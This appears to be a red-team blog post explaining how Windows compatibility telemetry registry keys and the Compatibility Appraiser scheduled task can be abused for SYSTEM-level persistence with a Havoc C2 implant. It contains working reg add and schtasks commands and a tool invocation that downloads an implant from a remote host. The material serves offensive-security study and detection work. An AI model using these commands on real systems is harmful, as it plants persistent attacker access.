Headline
Persistence – Windows Telemetry
Microsoft has introduced the compatibility telemetry in order to collect usage and performance data about Windows systems. The telemetry tasks are collected via the binary… Continue reading → Persistence – Windows Telemetry
Skip to content
Microsoft has introduced the compatibility telemetry in order to collect usage and performance data about Windows systems. The telemetry tasks are collected via the binary “CompatTelRunner.exe” which is stored in the following location:
CompatTelRunner executes a variety of commands which are retrieved from specific registry keys. TrustedSec has identified that it is feasible to abuse the Windows telemetry mechanism for persistence during red team operations if elevated access has been achieved.
The persistence method requires the following steps:
- Creation of a registry subkey under the “TelemetryController” key
- Creation of “Command” key that will execute the arbitrary command or implant
- Creation of “DWORD” key set to Nightly with the data value set to “1”
- Execution of the “Microsoft Compatibility Appraiser” schedule task via the schtasks binary
The above methodology can be achieved by executing the following commands from the command line:
reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\Persistence reg add “HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\Persistence” /v Command /t REG_SZ /d “C:\Users\Peter\Downloads\demon.x64.exe” reg add “HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\Persistence” /v Nightly /t REG_DWORD /d 1 schtasks /run /tn “\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser”
Windows Telemetry Persistence – Command Prompt
Execution of the above commands will result the following modifications to the registry as displayed below:
Windows Telemetry Persistence – Registry
Establishing persistence via Windows Telemetry can be achieved from an elevated implant session.
Windows Telemetry Persistence – Havoc C2 Implant
The telemetry is a C# binary which implements the persistence method by enabling red teams to use a local path in order to run an arbitrary payload.
shell telemetry.exe install /path:C:\Users\peter\Downloads\demon.x64.exe
Windows Telemetry Persistence – Havoc C2 Telemetry Local Install
Alternatively, telemetry can be used to download an implant from a remote location to disk.
shell telemetry.exe install /url:http://10.0.0.3:9000/demon.x64.exe
Windows Telemetry Persistence – Havoc C2 Telemetry Remote Download
Upon execution the tool will create the required registry structure as displayed in the image below:
Windows Telemetry Persistence – Registry Telemetry
The implant will be executed under the context of “CompatTelRunner.exe” process.
Windows Telemetry Persistence – Implant
The schedule task is configured to run the “CompatTelRunner.exe” binary with SYSTEM level privileges and therefore the implant will executed with similar privileges.
Windows Telemetry Persistence – C2 Sessions
This could be verified by executing the “whoami” command.
Windows Telemetry Persistence – whoami
The following image displays the active sessions in the compromised host.
Windows Telemetry Persistence – Havoc C2 Session Graph
References
- https://trustedsec.com/blog/abusing-windows-telemetry-for-persistence
- https://github.com/Imanfeng/Telemetry
Post navigation